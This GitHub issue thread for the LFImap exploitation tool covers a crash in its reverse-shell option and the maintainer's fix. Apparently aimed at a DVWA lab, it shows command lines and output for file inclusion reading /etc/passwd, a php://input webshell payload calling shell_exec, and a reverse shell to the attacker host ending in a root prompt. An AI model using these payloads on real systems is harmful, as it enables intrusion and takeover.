search

hansmach1ne / LFImap

Local File Inclusion discovery and exploitation tool
Apache License 2.0
192 stars 29 forks source link

-x no longer works #107

Closed X-l-l-l closed 2 days ago

X-l-l-l commented 2 days ago

Tried to initiate a reverse shell and this is the output i get:

 python3 lfimap.py -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "PHPSESSID=pee4sgbjm74s57o43h39vevqo0; security=low" -a --lhost 192.168.65.3 --lport 3001 -x -v

[i] Testing GET 'page' parameter...

[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[+] LFI -> 'http://localhost/vulnerabilities/fi/?page=php%3A%2F%2Ffilter%2Fresource%3D%2Fetc%2Fpasswd'
[i] Testing with input wrapper...
[+] RCE -> 'http://localhost/vulnerabilities/fi/?page=php%3a%2f%2finput&cmd=cat%20%2Fetc%2Fpasswd' -> HTTP POST -> '<?php echo(shell_exec($_GET['cmd']));?>'
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/lfimap.py", line 769, in <module>
    main()
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/lfimap.py", line 642, in main
    test_input(url, post)
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/attacks/input.py", line 57, in test_input
    _, br = REQUEST(u, reqHeaders, post, proxies, "RCE", "INPUT")
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/request.py", line 359, in REQUEST
    if init(res, "", exploitType, url, postData, headersData, exploitMethod):
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/request.py", line 148, in init
    pwn(exploit)
NameError: name 'pwn' is not defined
X-l-l-l commented 2 days ago

Found the fix too: from src.attacks.pwn import pwn is missing from src/httpreqs/requets.py

hansmach1ne commented 2 days ago

Thanks for raising this, I have reproduced the issue and provided a fix. Kindly 'git pull' and try again.

└─$ python3 lfimap.py -U "http://192.168.56.104/dvwa/vulnerabilities/fi/?page=include.php" -C "security=low; PHPSESSID=42d35a369ab7639b3e6bddae9b33d340" -i -v --lhost 192.168.56.116 --lport 3001 -x -v

[i] Testing GET 'page' parameter...
[i] Testing with input wrapper...
[+] RCE -> 'http://192.168.56.104/dvwa/vulnerabilities/fi/?page=php%3a%2f%2finput&cmd=cat%20%2Fetc%2Fpasswd' -> HTTP POST -> '<?php echo(shell_exec($_GET['cmd']));?>'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:3001
[.] Trying to pop reverse shell to 192.168.56.116:3001 using bash via input wrapper...
[?] Checking if netcat is available on the target system...
[.] Trying to pop reverse shell to 192.168.56.116:3001 using nc via input wrapper...

[*] Connection received from ('192.168.56.104', 42587)                                                                                               
[*] Press enter to spawn the shell. Type 'back' to continue or 'quit' to terminate LFImap.

sh: no job control in this shell
sh-3.2# ls
help
include.php
index.php
source
sh-3.2# whoami
root